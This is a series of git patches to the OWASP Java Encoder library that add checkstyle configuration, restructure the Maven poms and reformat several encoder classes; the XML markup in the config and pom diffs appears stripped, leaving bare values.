+0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/src/main/config/checkstyle-header.txt b/src/main/config/checkstyle-header.txt new file mode 100644 index 0000000..9a236ed --- /dev/null +++ b/src/main/config/checkstyle-header.txt @@ -0,0 +1,35 @@ +^// Copyright \(c\) 201[2-9] (Jeff Ichnowski|Jim Manico|Jeremy Long)\s*$ +^// All rights reserved\.\s*$ +^// +^// Redistribution and use in source and binary forms, with or without\s*$ +^// modification, are permitted provided that the following conditions\s*$ +^// are met:\s*$ +^//\s*$ +^// \* Redistributions of source code must retain the above\s*$ +^// copyright notice, this list of conditions and the following\s*$ +^// disclaimer\.\s*$ +^// +^// \* Redistributions in binary form must reproduce the above\s*$ +^// copyright notice, this list of conditions and the following\s*$ +^// disclaimer in the documentation and/or other materials\s*$ +^// provided with the distribution.\s*$ +^// +^// \* Neither the name of the OWASP nor the names of its\s*$ +^// contributors may be used to endorse or promote products\s*$ +^// derived from this software without specific prior written\s*$ +^// permission\.\s*$ +^// +^// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\s*$ +^// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\s*$ +^// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\s*$ +^// FOR A PARTICULAR PURPOSE ARE DISCLAIMED\. IN NO EVENT SHALL THE\s*$ +^// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,\s*$ +^// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\s*$ +^// \(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\s*$ +^// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION\)\s*$ +^// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,\s*$ +^// STRICT LIABILITY, OR TORT \(INCLUDING NEGLIGENCE OR OTHERWISE\)\s*$ +^// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED\s*$ +^// OF THE POSSIBILITY OF SUCH DAMAGE\.\s*$ +^\s*$ +^package diff --git a/src/main/config/checkstyle.xml b/src/main/config/checkstyle.xml new file mode 100644 index 0000000..3a2ea7c --- /dev/null +++ b/src/main/config/checkstyle.xml @@ -0,0 +1,202 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + -- cgit v1.2.3 From 1a8239a02802a34ec7f28f7d71baccc0fe98a288 Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Tue, 31 Mar 2015 09:05:31 -0400 Subject: updated ignored list --- .gitignore | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/.gitignore b/.gitignore index dbd3596..ae98f63 100644 --- a/.gitignore +++ b/.gitignore @@ -11,4 +11,5 @@ maven-eclipse.xml .externalToolBuilders # Netbeans configuration -nb-configuration.xml \ No newline at end of file +nb-configuration.xml +/target/ \ No newline at end of file -- cgit v1.2.3 From 6b29c00ba6eb3c4b89af0022e2fa006716d3489b Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Tue, 31 Mar 2015 09:06:33 -0400 Subject: overhauled pom.xml moving most of the build, dependency-management, etc. to the parent --- core/pom.xml | 193 -------------------------------------- esapi/pom.xml | 180 +---------------------------------- jsp/pom.xml | 181 +---------------------------------- pom.xml | 296 +++++++++++++++++++++++++++++++++++++++++++++++++++++++--- 4 files changed, 290 insertions(+), 560 deletions(-) diff --git a/core/pom.xml b/core/pom.xml index 8ee4d3d..eed4fd7 100644 --- a/core/pom.xml +++ b/core/pom.xml @@ -47,7 +47,6 @@ encoder - 1.2-SNAPSHOT jar OWASP Encoders @@ -63,179 +62,14 @@ org.apache.maven.plugins maven-surefire-plugin - 2.12 org/owasp/encoder/BenchmarkTest.java - - - org.codehaus.mojo - cobertura-maven-plugin - 2.5.2 - - - 85 - 85 - false - 85 - 85 - 85 - 85 - - - - - - clean - - - - - - org.apache.maven.plugins - maven-source-plugin - 2.2.1 - - - attach-sources - package - - jar - - - - - - org.apache.maven.plugins - maven-javadoc-plugin - 2.9 - - - attach-javadocs - package - - jar - - - - - - org.apache.maven.plugins - maven-site-plugin - 3.2 - - - - org.apache.maven.plugins - maven-project-info-reports-plugin - 2.6 - - - - index - summary - license - scm - mailing-list - issue-tracking - dependencies - plugin-management - project-team - - - - - - org.codehaus.mojo - versions-maven-plugin - 1.3.1 - - - - dependency-updates-report - plugin-updates-report - - - - - - org.apache.maven.plugins - maven-jxr-plugin - 2.3 - - - org.apache.maven.plugins - maven-surefire-report-plugin - 2.12.4 - - - - report-only - failsafe-report-only - - - - - - org.codehaus.mojo - cobertura-maven-plugin - 2.5.1 - - - org.apache.maven.plugins - maven-pmd-plugin - 2.7.1 - - 1.5 - true - utf-8 - - - - org.apache.maven.plugins - maven-javadoc-plugin - 2.9 - - - default - - javadoc - - - - - - org.apache.maven.plugins - maven-checkstyle-plugin - 2.9.1 - - ../checkstyle.xml - basedir=${basedir}/.. - - - - org.codehaus.mojo - findbugs-maven-plugin - 2.5.2 - - - - - - - - junit - junit - 3.8.1 - test - - - benchmark @@ -244,7 +78,6 @@ org.apache.maven.plugins maven-failsafe-plugin - 2.12.4 org/owasp/encoder/BenchmarkTest.java @@ -262,31 +95,5 @@ - - sign-artifacts - - - performRelease - true - - - - - - org.apache.maven.plugins - maven-gpg-plugin - - - sign-artifacts - verify - - sign - - - - - - - diff --git a/esapi/pom.xml b/esapi/pom.xml index dca2527..28118fe 100644 --- a/esapi/pom.xml +++ b/esapi/pom.xml @@ -47,198 +47,24 @@ encoder-esapi - 1.2-SNAPSHOT jar OWASP Encoders ESAPI Thunk - The OWASP Encoders package is a collection of high-performance low-overhead - contextual encoders, that when utilized correctly, is an effective tool in - preventing Web Application security vulnerabilities such as Cross-Site - Scripting. + The OWASP Encoders ESAPI Thunk provides an easy way to plugin the Encoder + Projects API into an implementation of ESAPI. - - - - org.apache.maven.plugins - maven-surefire-plugin - 2.12 - - - - org.codehaus.mojo - cobertura-maven-plugin - 2.5.2 - - - 85 - 85 - false - 85 - 85 - 85 - 85 - - - - - - clean - - - - - - org.apache.maven.plugins - maven-site-plugin - 3.2 - - - - org.apache.maven.plugins - maven-project-info-reports-plugin - 2.6 - - - - index - summary - license - scm - mailing-list - issue-tracking - dependencies - plugin-management - project-team - - - - - - org.codehaus.mojo - versions-maven-plugin - 1.3.1 - - - - dependency-updates-report - plugin-updates-report - - - - - - org.apache.maven.plugins - maven-jxr-plugin - 2.3 - - - org.apache.maven.plugins - maven-surefire-report-plugin - 2.12.4 - - - - report-only - failsafe-report-only - - - - - - org.codehaus.mojo - cobertura-maven-plugin - 2.5.1 - - - org.apache.maven.plugins - maven-pmd-plugin - 2.7.1 - - 1.5 - true - utf-8 - - - - org.apache.maven.plugins - maven-javadoc-plugin - 2.9 - - - default - - javadoc - - - - - - org.apache.maven.plugins - maven-checkstyle-plugin - 2.9.1 - - ../checkstyle.xml - basedir=${basedir}/.. - - - - org.codehaus.mojo - findbugs-maven-plugin - 2.5.2 - - - - - - - org.owasp.encoder encoder - 1.2-SNAPSHOT + ${project.parent.version} org.owasp.esapi esapi [2.0,3) - - junit - junit - 3.8.1 - test - - - - - sign-artifacts - - - performRelease - true - - - - - - org.apache.maven.plugins - maven-gpg-plugin - - - sign-artifacts - verify - - sign - - - - - - - - diff --git a/jsp/pom.xml b/jsp/pom.xml index 4ba1bff..383bc6a 100644 --- a/jsp/pom.xml +++ b/jsp/pom.xml @@ -47,164 +47,20 @@ encoder-jsp - 1.2-SNAPSHOT jar OWASP Encoders JSP tags and EL functions - The OWASP Encoders package is a collection of high-performance low-overhead - contextual encoders, that when utilized correctly, is an effective tool in - preventing Web Application security vulnerabilities such as Cross-Site - Scripting. + The OWASP Encoder JSP package contains JSP tag definitions and TLDs to allow + easy use of the OWASP Encoder Project's core API. The TLDs contain both tag + definitions and JSP EL functions. - - - - org.apache.maven.plugins - maven-surefire-plugin - 2.12 - - - - org.codehaus.mojo - cobertura-maven-plugin - 2.5.2 - - - 85 - 85 - false - 85 - 85 - 85 - 85 - - - - - - clean - - - - - - org.apache.maven.plugins - maven-site-plugin - 3.2 - - - - org.apache.maven.plugins - maven-project-info-reports-plugin - 2.6 - - - - index - summary - license - scm - mailing-list - issue-tracking - dependencies - plugin-management - project-team - - - - - - org.codehaus.mojo - versions-maven-plugin - 1.3.1 - - - - dependency-updates-report - plugin-updates-report - - - - - - org.apache.maven.plugins - maven-jxr-plugin - 2.3 - - - org.apache.maven.plugins - maven-surefire-report-plugin - 2.12.4 - - - - report-only - failsafe-report-only - - - - - - org.codehaus.mojo - cobertura-maven-plugin - 2.5.1 - - - org.apache.maven.plugins - maven-pmd-plugin - 2.7.1 - - 1.5 - true - utf-8 - - - - org.apache.maven.plugins - maven-javadoc-plugin - 2.9 - - - default - - javadoc - - - - - - org.apache.maven.plugins - maven-checkstyle-plugin - 2.9.1 - - ../checkstyle.xml - basedir=${basedir}/.. - - - - org.codehaus.mojo - findbugs-maven-plugin - 2.5.2 - - - - - - - org.owasp.encoder encoder - 1.2-SNAPSHOT - - - junit - junit - 3.8.1 - test + ${project.parent.version} javax.servlet.jsp @@ -231,33 +87,4 @@ test - - - - sign-artifacts - - - performRelease - true - - - - - - org.apache.maven.plugins - maven-gpg-plugin - - - sign-artifacts - verify - - sign - - - - - - - - diff --git a/pom.xml b/pom.xml index dac62c7..52c7938 100755 --- a/pom.xml +++ b/pom.xml @@ -53,6 +53,12 @@ Scripting. + + core + jsp + esapi + + https://www.owasp.org/index.php/OWASP_Java_Encoder_Project 2011 @@ -71,13 +77,13 @@ org.sonatype.oss oss-parent - 7 + 9 - scm:svn:https://owasp-java-encoder.googlecode.com/svn/trunk/ - scm:svn:http://owasp-java-encoder.googlecode.com/svn/trunk/ - http://code.google.com/p/owasp-java-encoder/source/browse/ + scm:git:git@github.com:jmanico/owasp-java-encoder.git + scm:git:git@github.com:jmanico/owasp-java-encoder.git + https://github.com/jmanico/owasp-java-encoder @@ -91,8 +97,8 @@ - Google Code - http://code.google.com/p/owasp-java-encoder/issues/list + github + https://github.com/jmanico/owasp-java-encoder/issues @@ -121,26 +127,290 @@ UTF-8 + UTF-8 + + + + junit + junit + 3.8.2 + + + + + + junit + junit + test + + + + + + org.apache.maven.plugins + maven-compiler-plugin + 3.2 + + + org.apache.maven.plugins + maven-jar-plugin + 2.5 + + + org.apache.maven.plugins + maven-source-plugin + 2.4 + + + org.apache.maven.plugins + maven-javadoc-plugin + 2.10.1 + + + org.codehaus.mojo + cobertura-maven-plugin + 2.7 + + + org.apache.maven.plugins + maven-failsafe-plugin + 2.18.1 + + + org.apache.maven.plugins + maven-surefire-plugin + 2.18.1 + + + org.apache.maven.plugins + maven-surefire-report-plugin + 2.18.1 + + + org.apache.maven.plugins + maven-gpg-plugin + 1.6 + + + org.apache.maven.plugins + maven-site-plugin + 3.4 + + + org.apache.maven.plugins + maven-project-info-reports-plugin + 2.8 + + + org.apache.maven.plugins + maven-pmd-plugin + 3.4 + + + org.codehaus.mojo + versions-maven-plugin + 2.1 + + + org.apache.maven.plugins + maven-jxr-plugin + 2.5 + + + org.codehaus.mojo + findbugs-maven-plugin + 3.0.0 + + + + org.apache.maven.plugins maven-compiler-plugin - 3.0 1.5 1.5 + + org.codehaus.mojo + cobertura-maven-plugin + + + 85 + 85 + false + 85 + 85 + 85 + 85 + + + + + + clean + + + + + + org.apache.maven.plugins + maven-surefire-plugin + + + org/owasp/encoder/BenchmarkTest.java + + + + + org.apache.maven.plugins + maven-source-plugin + + + attach-sources + package + + jar + + + + + + org.apache.maven.plugins + maven-javadoc-plugin + + + attach-javadocs + package + + jar + + + + - - - core - jsp - esapi - + + + + org.apache.maven.plugins + maven-project-info-reports-plugin + + + + index + summary + license + scm + mailing-list + issue-tracking + dependencies + plugin-management + project-team + + + + + + org.codehaus.mojo + versions-maven-plugin + + + + dependency-updates-report + plugin-updates-report + + + + + + org.apache.maven.plugins + maven-jxr-plugin + + + org.apache.maven.plugins + maven-surefire-report-plugin + + + + report-only + failsafe-report-only + + + + + + org.codehaus.mojo + cobertura-maven-plugin + + + org.apache.maven.plugins + maven-pmd-plugin + + 1.5 + true + utf-8 + + + + org.apache.maven.plugins + maven-javadoc-plugin + + + default + + javadoc + + + + + + org.apache.maven.plugins + maven-checkstyle-plugin + + src/main/config/checkstyle.xml + src/main/config/checkstyle-header.txt + + + + + org.codehaus.mojo + findbugs-maven-plugin + + + + + + sign-artifacts + + + performRelease + true + + + + + + org.apache.maven.plugins + maven-gpg-plugin + + + sign-artifacts + verify + + sign + + + + + + + + -- cgit v1.2.3 From fe0574f8b168d6d558129fe4b2c018f10259cba6 Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Tue, 31 Mar 2015 19:09:30 -0400 Subject: removed check for RedundatThrows --- src/main/config/checkstyle.xml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/src/main/config/checkstyle.xml b/src/main/config/checkstyle.xml index 3a2ea7c..0cf1696 100644 --- a/src/main/config/checkstyle.xml +++ b/src/main/config/checkstyle.xml @@ -133,9 +133,9 @@ - + -- cgit v1.2.3 From 016a7733687c6a5e79d5e4283c6e2244b8f5cc4e Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Tue, 31 Mar 2015 20:00:53 -0400 Subject: reverted to an older version of cobertura --- pom.xml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/pom.xml b/pom.xml index 52c7938..bab992c 100755 --- a/pom.xml +++ b/pom.xml @@ -172,7 +172,7 @@ org.codehaus.mojo cobertura-maven-plugin - 2.7 + 2.5.2 org.apache.maven.plugins -- cgit v1.2.3 From 9796d9ec81a997e0fee2ed630837e3d91cf86abd Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Tue, 31 Mar 2015 20:03:11 -0400 Subject: changes to remove empty if statements identified by checkstyle --- .../main/java/org/owasp/encoder/CDATAEncoder.java | 125 ++++++----- .../main/java/org/owasp/encoder/EncodedWriter.java | 65 +++--- .../main/java/org/owasp/encoder/URIEncoder.java | 146 +++++++------ .../java/org/owasp/encoder/XMLCommentEncoder.java | 82 +++----- .../main/java/org/owasp/encoder/XMLEncoder.java | 234 +++++++++------------ 5 files changed, 298 insertions(+), 354 deletions(-) diff --git a/core/src/main/java/org/owasp/encoder/CDATAEncoder.java b/core/src/main/java/org/owasp/encoder/CDATAEncoder.java index 7096a2c..8702a65 100644 --- a/core/src/main/java/org/owasp/encoder/CDATAEncoder.java +++ b/core/src/main/java/org/owasp/encoder/CDATAEncoder.java @@ -31,37 +31,38 @@ // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. - package org.owasp.encoder; import java.nio.CharBuffer; import java.nio.charset.CoderResult; /** - * CDATAEncoder -- encoder for CDATA sections. CDATA sections are generally - * good for including large blocks of text that contain characters that - * normally require encoding (ampersand, quotes, less-than, etc...). The - * CDATA context however still does not allow invalid characters, and can - * be closed by the sequence "]]>". This encoder removes invalid XML - * characters, and encodes "]]>" (to "]]>]]<![CDATA[>"). The result is - * that the data integrity is maintained, but the code receiving the output - * will have to handle multiple CDATA events with character events between. - * As an alternate approach, the caller could pre-encode "]]>" to something - * of their choosing (e.g. data.replaceAll("\\]\\]>", "]] >")), then use - * this encoder to remove any invalid XML characters. + * CDATAEncoder -- encoder for CDATA sections. CDATA sections are generally good for including large blocks of text that contain + * characters that normally require encoding (ampersand, quotes, less-than, etc...). The CDATA context however still does not + * allow invalid characters, and can be closed by the sequence "]]>". This encoder removes invalid XML characters, and encodes + * "]]>" (to "]]>]]<![CDATA[>"). The result is that the data integrity is maintained, but the code receiving the output will + * have to handle multiple CDATA events with character events between. As an alternate approach, the caller could pre-encode "]]>" + * to something of their choosing (e.g. data.replaceAll("\\]\\]>", "]] >")), then use this encoder to remove any invalid XML + * characters. * * @author Jeff Ichnowski */ class CDATAEncoder extends Encoder { - /** The encoding of @{code "]]>"}. */ - private static final char[] CDATA_END_ENCODED = - "]]>]]".toCharArray(); + /** + * The encoding of @{code "]]>"}. + */ + private static final char[] CDATA_END_ENCODED + = "]]>]]".toCharArray(); - /** Length of {@code "]]>]]"}. */ + /** + * Length of {@code "]]>]]"}. + */ private static final int CDATA_END_ENCODED_LENGTH = 15; - /** Length of {@code "]]>"}. */ + /** + * Length of {@code "]]>"}. + */ private static final int CDATA_END_LENGTH = 3; @Override @@ -83,35 +84,37 @@ class CDATAEncoder extends Encoder { @Override protected int firstEncodedOffset(String input, int off, int len) { final int n = off + len; - int closeCount = 0; - for (int i=off ; i= ' ' || ch == '\n' || ch == '\r' || ch == '\t') { - // valid - } else { + if (ch < ' ' && ch != '\n' && ch != '\r' && ch != '\t') { return i; +// } else { +// // valid } + } else { - if (i+1 < n) { - if (input.charAt(i+1) != ']') { + if (i + 1 < n) { + if (input.charAt(i + 1) != ']') { // "]x" (next character is safe for this to be ']') } else { // "]]?" // keep looping through ']' - for ( ; i+2 < n && input.charAt(i+2) == ']' ; ++i) { + for (; i + 2 < n && input.charAt(i + 2) == ']'; ++i) { // valid } // at this point we've looped through a sequence // of 2 or more "]", if the next character is ">" // we need to encode "]]>". - if (i+2 < n) { - if (input.charAt(i+2) == '>') { + if (i + 2 < n) { + if (input.charAt(i + 2) == '>') { return i; - } else { - // valid +// } else { +// // valid } + } else { return n; } @@ -121,15 +124,15 @@ class CDATAEncoder extends Encoder { } } } else if (ch < Character.MIN_HIGH_SURROGATE) { - if (ch > Unicode.MAX_C1_CTRL_CHAR || ch == Unicode.NEL) { - // valid - } else { + if (ch <= Unicode.MAX_C1_CTRL_CHAR && ch != Unicode.NEL) { return i; +// } else { +// // valid } } else if (ch <= Character.MAX_HIGH_SURROGATE) { - if (i+1 < n) { - if (Character.isLowSurrogate(input.charAt(i+1))) { - int cp = Character.toCodePoint(ch, input.charAt(i+1)); + if (i + 1 < n) { + if (Character.isLowSurrogate(input.charAt(i + 1))) { + int cp = Character.toCodePoint(ch, input.charAt(i + 1)); if (Unicode.isNonCharacter(cp)) { return i; } else { @@ -143,16 +146,14 @@ class CDATAEncoder extends Encoder { // end of input, high without low = invalid return i; } - } else if ( - // low surrogate without preceding high surrogate - ch <= Character.MAX_LOW_SURROGATE || - // non characters - ch > '\ufffd' || - ('\ufdd0' <= ch && ch <= '\ufdef')) - { + } else if ( // low surrogate without preceding high surrogate + ch <= Character.MAX_LOW_SURROGATE + || // non characters + ch > '\ufffd' + || ('\ufdd0' <= ch && ch <= '\ufdef')) { return i; - } else { - // valid +// } else { +// // valid } } @@ -168,7 +169,7 @@ class CDATAEncoder extends Encoder { int j = output.arrayOffset() + output.position(); final int m = output.arrayOffset() + output.limit(); - for ( ; i= m) { return overflow(input, i, output, j); @@ -191,7 +192,7 @@ class CDATAEncoder extends Encoder { } else { // "]]?" // keep looping through ']' - for ( ; i+2 < n && in[i+2] == ']' ; ++i) { + for (; i + 2 < n && in[i + 2] == ']'; ++i) { if (j >= m) { return overflow(input, i, output, j); } @@ -200,9 +201,9 @@ class CDATAEncoder extends Encoder { // at this point we've looped through a sequence // of 2 or more "]", if the next character is ">" // we need to encode "]]>". - if (i+2 < n) { - if (in[i+2] == '>') { - if (j+CDATA_END_ENCODED_LENGTH > m) { + if (i + 2 < n) { + if (in[i + 2] == '>') { + if (j + CDATA_END_ENCODED_LENGTH > m) { return overflow(input, i, output, j); } System.arraycopy(CDATA_END_ENCODED, 0, out, j, CDATA_END_ENCODED_LENGTH); @@ -215,7 +216,7 @@ class CDATAEncoder extends Encoder { out[j++] = ']'; } } else if (endOfInput) { - if (j+2 > m) { + if (j + 2 > m) { return overflow(input, i, output, j); } out[j++] = ']'; @@ -252,9 +253,9 @@ class CDATAEncoder extends Encoder { out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT; } } else if (ch <= Character.MAX_HIGH_SURROGATE) { - if (i+1 < n) { - if (Character.isLowSurrogate(in[i+1])) { - int cp = Character.toCodePoint(ch, in[i+1]); + if (i + 1 < n) { + if (Character.isLowSurrogate(in[i + 1])) { + int cp = Character.toCodePoint(ch, in[i + 1]); if (Unicode.isNonCharacter(cp)) { if (j >= m) { return overflow(input, i, output, j); @@ -262,7 +263,7 @@ class CDATAEncoder extends Encoder { out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT; ++i; } else { - if (j+1 >= m) { + if (j + 1 >= m) { return overflow(input, i, output, j); } out[j++] = ch; @@ -284,13 +285,11 @@ class CDATAEncoder extends Encoder { } else { break; } - } else if ( - // low surrogate without preceding high surrogate - ch <= Character.MAX_LOW_SURROGATE || - // non characters - ch > '\ufffd' || - ('\ufdd0' <= ch && ch <= '\ufdef')) - { + } else if ( // low surrogate without preceding high surrogate + ch <= Character.MAX_LOW_SURROGATE + || // non characters + ch > '\ufffd' + || ('\ufdd0' <= ch && ch <= '\ufdef')) { if (j >= m) { return overflow(input, i, output, j); } diff --git a/core/src/main/java/org/owasp/encoder/EncodedWriter.java b/core/src/main/java/org/owasp/encoder/EncodedWriter.java index 685c976..59da149 100644 --- a/core/src/main/java/org/owasp/encoder/EncodedWriter.java +++ b/core/src/main/java/org/owasp/encoder/EncodedWriter.java @@ -31,7 +31,6 @@ // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. - package org.owasp.encoder; import java.io.IOException; @@ -40,8 +39,7 @@ import java.nio.CharBuffer; import java.nio.charset.CoderResult; /** - * EncodedWriter -- A writer the encodes all input for a specific - * context and writes the encoded output to another writer. + * EncodedWriter -- A writer the encodes all input for a specific context and writes the encoded output to another writer. * * @author Jeff Ichnowski */ @@ -49,11 +47,11 @@ public class EncodedWriter extends Writer { /** * Buffer size to allocate. - * */ + * + */ static final int BUFFER_SIZE = 1024; /** - * Buffer to use for handling characters remaining in the input - * buffer after an encode. The value is set high enough to handle + * Buffer to use for handling characters remaining in the input buffer after an encode. The value is set high enough to handle * the lookaheads of all the encoders in the package. */ static final int LEFT_OVER_BUFFER = 16; @@ -69,33 +67,26 @@ public class EncodedWriter extends Writer { private Encoder _encoder; /** - * Where encoded output is buffered before sending on to the - * output writer. + * Where encoded output is buffered before sending on to the output writer. */ private CharBuffer _buffer = CharBuffer.allocate(BUFFER_SIZE); /** - * Some encoders require more input or an explicit end-of-input - * flag before they will process the remaining characters of an - * input buffer. Because the writer API cannot pass this - * information on to the caller (e.g. by returning how many bytes - * were actually written), this writer implementation must buffer - * up the remaining characters between calls. The - * _hasLeftOver boolean is a flag used to indicate - * that there are left over characters in the buffer. + * Some encoders require more input or an explicit end-of-input flag before they will process the remaining characters of an + * input buffer. Because the writer API cannot pass this information on to the caller (e.g. by returning how many bytes were + * actually written), this writer implementation must buffer up the remaining characters between calls. The + * _hasLeftOver boolean is a flag used to indicate that there are left over characters in the buffer. */ private boolean _hasLeftOver; /** - * See comment on _hasLeftOver. This buffer is created on-demand - * once. Whether it has anything to flush is determined by the + * See comment on _hasLeftOver. This buffer is created on-demand once. Whether it has anything to flush is determined by the * _hasLeftOver flag. */ private CharBuffer _leftOverBuffer; /** - * Creates an EncodedWriter that uses the specified encoder to - * encode all input before sending it to the wrapped writer. + * Creates an EncodedWriter that uses the specified encoder to encode all input before sending it to the wrapped writer. * * @param out the target for all writes * @param encoder the encoder to use @@ -103,10 +94,10 @@ public class EncodedWriter extends Writer { public EncodedWriter(Writer out, Encoder encoder) { super(out); - if (out == null) { - throw new NullPointerException("writer must not be null"); - } - +// Reduntant null check, super(out) checks for null and throws NPE. +// if (out == null) { +// throw new NullPointerException("writer must not be null"); +// } if (encoder == null) { throw new NullPointerException("encoder must not be null"); } @@ -117,20 +108,18 @@ public class EncodedWriter extends Writer { } /** - * Creates an EncodedWriter that uses the specified encoder to - * encode all input before sending it to the wrapped writer. - * This method is equivalent to calling: + * Creates an EncodedWriter that uses the specified encoder to encode all input before sending it to the wrapped writer. This + * method is equivalent to calling: * 
          *     new EncodedWriter(out, Encoders.forName(contextName));
      *
    + * * @param out the target for all writes * @param contextName the encoding context name. - * @throws UnsupportedContextException if the contextName is - * unrecognized or not supported. + * @throws UnsupportedContextException if the contextName is unrecognized or not supported. */ public EncodedWriter(Writer out, String contextName) - throws UnsupportedContextException - { + throws UnsupportedContextException { this(out, Encoders.forName(contextName)); } @@ -138,7 +127,7 @@ public class EncodedWriter extends Writer { public void write(char[] cbuf, int off, int len) throws IOException { synchronized (lock) { CharBuffer input = CharBuffer.wrap(cbuf); - input.limit(off+len).position(off); + input.limit(off + len).position(off); flushLeftOver(input); @@ -163,8 +152,7 @@ public class EncodedWriter extends Writer { } /** - * Flushes the contents of the buffer to the writer and resets the - * buffer to make room for more input. + * Flushes the contents of the buffer to the writer and resets the buffer to make room for more input. * * @throws IOException thrown by the wrapped output. */ @@ -174,17 +162,14 @@ public class EncodedWriter extends Writer { } /** - * Flushes the left-over buffer. Characters from the input buffer - * are used to add more data to the _leftOverBuffer in order to + * Flushes the left-over buffer. Characters from the input buffer are used to add more data to the _leftOverBuffer in order to * make the flush happen. * - * @param input the next input to encode, or null if at end of - * file. + * @param input the next input to encode, or null if at end of file. * @throws IOException from the underlying writer. */ private void flushLeftOver(CharBuffer input) - throws IOException - { + throws IOException { if (!_hasLeftOver) { return; } diff --git a/core/src/main/java/org/owasp/encoder/URIEncoder.java b/core/src/main/java/org/owasp/encoder/URIEncoder.java index 5088b11..9810dab 100644 --- a/core/src/main/java/org/owasp/encoder/URIEncoder.java +++ b/core/src/main/java/org/owasp/encoder/URIEncoder.java @@ -31,7 +31,6 @@ // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. - package org.owasp.encoder; import java.nio.CharBuffer; @@ -44,16 +43,21 @@ import java.nio.charset.CoderResult; */ class URIEncoder extends Encoder { - /** Number of characters in the range '0' to '9'. */ + /** + * Number of characters in the range '0' to '9'. + */ static final int CHARS_0_TO_9 = 10; - /** Number of characters in the range 'a' to 'z'. */ + /** + * Number of characters in the range 'a' to 'z'. + */ static final int CHARS_A_TO_Z = 26; - /** Number of bits in a long. */ + /** + * Number of bits in a long. + */ static final int LONG_BITS = 64; /** - * Maximum number of characters quired to encode a single input - * character. + * Maximum number of characters quired to encode a single input character. */ static final int MAX_ENCODED_CHAR_LENGTH = 9; /** @@ -65,23 +69,19 @@ class URIEncoder extends Encoder { */ static final int MAX_UTF8_2_BYTE = 0x7ff; /** - * When the encoded output requires 2 bytes, this is the high - * bits of the first byte. + * When the encoded output requires 2 bytes, this is the high bits of the first byte. */ static final int UTF8_2_BYTE_FIRST_MSB = 0xc0; /** - * When the encoded output requires 3 bytes, this is the high - * bits of the first byte. + * When the encoded output requires 3 bytes, this is the high bits of the first byte. */ static final int UTF8_3_BYTE_FIRST_MSB = 0xe0; /** - * When the encoded output requires 4 bytes, this is the high - * bits of the first byte. + * When the encoded output requires 4 bytes, this is the high bits of the first byte. */ static final int UTF8_4_BYTE_FIRST_MSB = 0xf0; /** - * For all characters in a 2-4 byte encoded sequence after the first - * this is the high bits of the input bytes. + * For all characters in a 2-4 byte encoded sequence after the first this is the high bits of the input bytes. */ static final int UTF8_BYTE_MSB = 0x80; @@ -100,11 +100,9 @@ class URIEncoder extends Encoder { static final char INVALID_REPLACEMENT_CHARACTER = '-'; /** - * RFC 3986 -- "The uppercase hexadecimal digits 'A' through 'F' are - * equivalent to the lowercase digits 'a' through 'f', respectively. If two - * URIs differ only in the case of hexadecimal digits used in percent- - * encoded octets, they are equivalent. For consistency, URI producers and - * normalizers should use uppercase hexadecimal digits for all percent- + * RFC 3986 -- "The uppercase hexadecimal digits 'A' through 'F' are equivalent to the lowercase digits 'a' through 'f', + * respectively. If two URIs differ only in the case of hexadecimal digits used in percent- encoded octets, they are + * equivalent. For consistency, URI producers and normalizers should use uppercase hexadecimal digits for all percent- * encodings." */ static final char[] UHEX = "0123456789ABCDEF".toCharArray(); @@ -113,40 +111,35 @@ class URIEncoder extends Encoder { // 0x20: ! " # $ % & ' ( ) * + , - . / 0 1 2 3 4 5 6 7 8 9 : ; < = > ? // 0x40: @ A B C D E F G H I J K L M N O P Q R S T U V W X Y Z [ \ ] ^ _ // 0x60: ` a b c d e f g h i j k l m n o p q r s t u v w x y z { | } ~ - - // ASCII table of RFC 3986 "Unreserved Characters" // 0x20: - . 0 1 2 3 4 5 6 7 8 9 // 0x40: A B C D E F G H I J K L M N O P Q R S T U V W X Y Z _ // 0x60: a b c d e f g h i j k l m n o p q r s t u v w x y z 